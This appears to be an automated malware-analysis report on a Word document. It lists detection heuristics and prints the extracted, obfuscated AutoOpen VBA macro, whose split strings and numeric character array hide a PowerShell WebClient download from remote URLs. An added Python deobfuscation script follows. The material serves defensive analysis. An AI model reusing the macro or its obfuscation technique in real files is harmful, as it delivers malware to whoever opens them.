Verdict: MALICIOUS (Risk Score: 342)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains an obfuscated AutoOpen VBA macro that uses CreateObject and Shell calls. The macro assembles a PowerShell command at run time from concatenated string fragments and a numeric character array, so the command line and its URL never appear in clear text in the macro source, then executes it to download and run a script from a remote URL. This is downloader or dropper behaviour, typical of first-stage malware.
Heuristics (9)
- ClamAV: Doc.Dropper.Agent-6602077-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6602077-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML namespace URI from the OOXML schema, not a host the sample contacts; the macro's real download URL is not present as plain text anywhere in the document.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14825 bytes | 1e756a1e4cfadfd78706f66b05c912de57c1b3300479ec53a9cfc7e319b5e8bd |

Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "HCnbjzY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
krmwDj = (11968 + iRHTmz * 36026 / zrTcKk / 46395 * qNTHw + ZhOHDa - OEGZmt)
jLrCZ = (42197 + ZdiLu * 15060 / XjSwhi / 459 * ENrKb + jbqja - uXmYEo)
XDHNGN = (86597 + rHMWNV * 69410 / NzGvRM / 17247 * diibiK + MAJHs - liaUbf)
AjmNk = (88063 + TkzTj * 14823 / NwulsZ / 9141 * wrzlnN + XqTGY - mUjMf)
jTpQpDdkj (CYYlO + DQLsilJD + jVKnmh + GpOPSqwE)
lhQJMp = (89199 + tTrRi * 25441 / IuImG / 54431 * NiNSjV + Ddczud - injDz)
fwwcC = (14509 + CiwzGN * 13534 / LPuttC / 76984 * UPpzwt + sXNzYQ - iZMpZL)
End Sub
Attribute VB_Name = "jhzOVMEvQZ"
Function CYYlO()
On Error Resume Next
CdZJus = (huEwQ + QVqsM / ntfpt + PRPlf) / (26299 * 97904)
WknmQt = (sRjbrk + ClMis / OjqHzW + TaBvv) / (58071 * 72781)
EjknFiaSL = "wershell " + " " + " " + " " + Chr(40) + " [ChaR[]" + "] " + Chr(40) + " 3" + "6 ,8" + "3 , 1" + "09 ,82," + " 61, 110," + " 101 ," + " 119 ,"
tzYED = (rJYIS + PluVT / TrDOFB + XTvzOi) / (61636 * 78311)
hJTvSk = (wVPWI + jdwinf / udvOu + NwBYA) / (76675 * 54347)
iJitVU = (NsXHt + jFCRU / oWofn + bwvOrz) / (11979 * 10987)
hVlmS = "45 , 11" + "1 ,9" + "8 ,1" + "06 ,101," + " 99 ,11" + "6 ,32" + " ,78" + " ,101 , 1"
NwNknt = (TGcHRc + PoTwp / LEkjbi + lIkvi) / (15457 * 69621)
kzKpj = (wapaGo + jVXmoF / iZuZF + Njojq) / (22535 * 20658)
FibJCT = (GbGzN + ChNIC / isXIj + wMJZma) / (14336 * 2871)
zsTYVMHzk = "16 ,46" + ",87,1" + "01 ," + " 98, 67" + " ,10" + "8, 105 ,1" + "01 ,110" + ", 116, " + "59,36 ," + " 73 " + ", 72 , 10" + "2 ,61 "
icvEQ = (lluqLQ + fICwz / vvJka + SPUhrd) / (68498 * 54948)
DSMlG = (zwqkbZ + WPVFlJ / dIIbL + WhdJs) / (95951 * 80804)
NFwkwZHjNj = ", 39 , 10" + "4 , 11" + "6 , 11" + "6 ,112,58" + ", 47, " + "47,119" + " , 119, " + "119 ," + " 46,"
rREjD = (vzaBJ + AazdE / mRBpY + DcTLYX) / (11253 * 5690)
KjtbsX = (lAtIC + GuAfT / UrVIz + QDCMc) / (77160 * 11613)
BUDmzwbh = "102,116 " + ",112," + "46, 10" + "4 ,111," + "109, 101 " + ",115" + " , 50"
VhIrq = (JuRGsM + GpAajf / NjnPpr + StLiGV) / (35155 * 69702)
cwvQw = (svHoK + dFjXf / cOCtI + bEkaCv) / (12044 * 9061)
QMRtaa = " ,115,10" + "1,10" + "1 ,46 " + ",99, 1" + "11 ," + "109, 47"
ckFIcB = (OOikBV + ZDzlu / CzEqBF + mrXVo) / (71772 * 74289)
MqbYBqsrfW = ", 105" + " , 110," + " 116 ,11" + "4 , 97," + "110,101" + " , 116, 4" + "7,80, 5" + "5 , 50," + " 57,56, " + "88,68 ,"
fIQbWu = (JQMFZ + XjPAi / YwkIb + mBlbG) / (94780 * 4612)
FGlcac = (hrpMj + UwHWl / fOGWdA + qIwQi) / (28345 * 58489)
vTrEMkcF = "116 " + ", 10" + "0, 47 " + ", 64," + " 104, 11" + "6, 11" + "6,112" + " ,58"
MmatRI = (TlbCI + CQSuhh / EAjlmh + nfnlmh) / (63523 * 622)
qXdSA = (rjEwRV + YNmGj / zRmWt + OwBsZL) / (61311 * 67430)
zGKGl = (zGQvw + kQBikP / uvAoYj + XiJPDZ) / (53392 * 9218)
lUjHNFmB = ",47, 47" + " ,119 , 1" + "19 , 119" + ", 46 ,11" + "9, 1" + "04,97 ,"
CYYlO = EjknFiaSL + hVlmS + zsTYVMHzk + NFwkwZHjNj + BUDmzwbh + QMRtaa + MqbYBqsrfW + vTrEMkcF + lUjHNFmB
bNcJPc = (ivKNR + cFTuHb / qCPswE + PbOsq) / (22958 * 15507)
lOQFjW = (LYWmlj + ozrfWX / incPiG + MUJXJS) / (2295 * 94816)
FqISlS = (FKzcGQ + BAnMCp / jSUow + PbEBPm) / (14776 * 52704)
End Function
Function DQLsilJD()
On Error Resume Next
NETTI = (ijzlr + UNOiLL / EwmhC + NpnIVR) / (14046 * 880)
iOLali = (jvZjRp + tVwtZ / jKKPnD + RWFmYw) / (47640 * 30618)
hpRzBWN = "114,102,1" + "04, 1" + "11,116, " + "101,1" + "08 ,98,97" + ",115 , "
GdHEd = (QcJsQX + cUJjtG / jCkSH + YjSsjb) / (60104 * 89999)
kOYNzQ = (MLzPO + DMLmJR / oisoLM + FTnOzV) / (6115 * 54566)
iMuXAR = (ZMNpdG + FUNcn / nahvB + HspnOF) / (78803 * 75270)
KkLubM = (ThhjK + omJWKh / sozkM + KRLoss) / (92658 * 77253)
GdaGji = (RpSBrX + lNvoTa / RpvOr + cUjwO) / (56747 * 50977)
IiFnhGkdZ = "115 ,97" + " ,10 ... (truncated)
```
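The preview shows the loader shape the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER rule describes: every routine is mostly arithmetic filler over variables that are never assigned, and the real payload is a string built from split literals and `Chr()` calls that spells out a PowerShell `[ChaR[]]` code array. The following Python script is an added example, not part of the report or of the analyzer: it is a minimal static evaluator that walks the VBA source, keeps only assignments whose right-hand side is a pure string expression (literals, `Chr(n)` and already-known string variables joined by `+` or `&`), reassembles each function's return value, and then decodes the numeric character array into text. The input is the `CYYlO` function from the preview above, with two of its filler lines kept to show they are ignored and the rest omitted; `recover`, `evaluate_strings`, `eval_string_expr` and `decode_char_array` are names chosen for this example.

```python
import re

# Constructed input: function CYYlO as it appears in the macros.bas preview on
# this page, with most arithmetic filler lines dropped (two kept on purpose).
VBA_SRC = r'''Attribute VB_Name = "jhzOVMEvQZ"
Function CYYlO()
On Error Resume Next
CdZJus = (huEwQ + QVqsM / ntfpt + PRPlf) / (26299 * 97904)
EjknFiaSL = "wershell " + " " + " " + " " + Chr(40) + " [ChaR[]" + "] " + Chr(40) + " 3" + "6 ,8" + "3 , 1" + "09 ,82," + " 61, 110," + " 101 ," + " 119 ,"
hVlmS = "45 , 11" + "1 ,9" + "8 ,1" + "06 ,101," + " 99 ,11" + "6 ,32" + " ,78" + " ,101 , 1"
zsTYVMHzk = "16 ,46" + ",87,1" + "01 ," + " 98, 67" + " ,10" + "8, 105 ,1" + "01 ,110" + ", 116, " + "59,36 ," + " 73 " + ", 72 , 10" + "2 ,61 "
NFwkwZHjNj = ", 39 , 10" + "4 , 11" + "6 , 11" + "6 ,112,58" + ", 47, " + "47,119" + " , 119, " + "119 ," + " 46,"
BUDmzwbh = "102,116 " + ",112," + "46, 10" + "4 ,111," + "109, 101 " + ",115" + " , 50"
QMRtaa = " ,115,10" + "1,10" + "1 ,46 " + ",99, 1" + "11 ," + "109, 47"
MqbYBqsrfW = ", 105" + " , 110," + " 116 ,11" + "4 , 97," + "110,101" + " , 116, 4" + "7,80, 5" + "5 , 50," + " 57,56, " + "88,68 ,"
vTrEMkcF = "116 " + ", 10" + "0, 47 " + ", 64," + " 104, 11" + "6, 11" + "6,112" + " ,58"
lUjHNFmB = ",47, 47" + " ,119 , 1" + "19 , 119" + ", 46 ,11" + "9, 1" + "04,97 ,"
CYYlO = EjknFiaSL + hVlmS + zsTYVMHzk + NFwkwZHjNj + BUDmzwbh + QMRtaa + MqbYBqsrfW + vTrEMkcF + lUjHNFmB
bNcJPc = (ivKNR + cFTuHb / qCPswE + PbOsq) / (22958 * 15507)
End Function
'''

# One token per alternative: "literal" (with "" as an escaped quote), Chr(n),
# identifier, concatenation operator, or anything else (which disqualifies the line).
TOKEN = re.compile(
    r'"((?:[^"]|"")*)"|Chr\$?\(\s*(\d+)\s*\)|([A-Za-z_]\w*)|([+&])|(\S)', re.I)


def eval_string_expr(expr, env):
    """Evaluate a VBA expression made only of string literals, Chr(n) and known
    string variables joined by + or &. Returns None for anything else, which is
    how the arithmetic filler lines are filtered out (they contain parentheses,
    numbers and never-assigned variables)."""
    out, want_operand = [], True
    for m in TOKEN.finditer(expr):
        lit, code, ident, op, other = m.groups()
        if other is not None:
            return None
        if op is not None:
            if want_operand:
                return None
            want_operand = True
            continue
        if not want_operand:
            return None
        if lit is not None:
            out.append(lit.replace('""', '"'))
        elif code is not None:
            out.append(chr(int(code)))
        elif ident in env:
            out.append(env[ident])
        else:
            return None
        want_operand = False
    return None if want_operand else "".join(out)


def evaluate_strings(vba_src):
    """Walk a module line by line. In VBA a function's return value is the
    assignment to its own name, so the result maps function name -> string for
    every Function/Sub whose return variable ended up holding a string."""
    env, results, current = {}, {}, None
    for line in vba_src.splitlines():
        line = line.strip()
        if re.match(r"End\s+(Function|Sub)\b", line, re.I):
            if current in env:
                results[current] = env[current]
            current, env = None, {}
            continue
        m = re.match(r"(?:Public\s+|Private\s+)?(Function|Sub)\s+(\w+)", line, re.I)
        if m:
            current, env = m.group(2), {}
            continue
        m = re.match(r"(\w+)\s*=\s*(.+)$", line)
        if not m:
            continue
        val = eval_string_expr(m.group(2), env)
        if val is not None:
            env[m.group(1)] = val
    return results


def decode_char_array(s):
    """Turn the first PowerShell `[ChaR[]] ( n, n, ... )` array in s into text.
    A truncated array (no closing parenthesis, as in the preview) is decoded as
    far as the codes go."""
    m = re.search(r"\[char\[\]\]\s*\(\s*([\d\s,]+)", s, re.I)
    if not m:
        return ""
    codes = [int(c) for c in re.sub(r"\s", "", m.group(1)).split(",") if c]
    return "".join(chr(c) for c in codes)


def recover(vba_src=VBA_SRC):
    """(function name, reassembled string, decoded char-array text) per function."""
    return [(name, s, decode_char_array(s)) for name, s in evaluate_strings(vba_src).items()]


if __name__ == "__main__":
    for name, raw, decoded in recover():
        print(f"{name}: {raw[:60]!r} ...")
        print(f"  decoded: {decoded!r}")
```

Run against the fragment above, the reassembled `CYYlO` string begins with `wershell    ( [ChaR[]] ( 36 ,83 ,` and the array decodes to a `new-object Net.WebClient` assignment followed by a single-quoted `http://` URL list in which a second URL is introduced with `@`, which is the download stage the Malware Insights summary refers to. The fragment is cut off where the preview is, so the rest of the command is not recoverable from this page. The filler lines divide by variables that are never assigned; in VBA those evaluate to Empty, so the divisions would raise a run-time error, and the `On Error Resume Next` at the top of every routine is there to swallow exactly that.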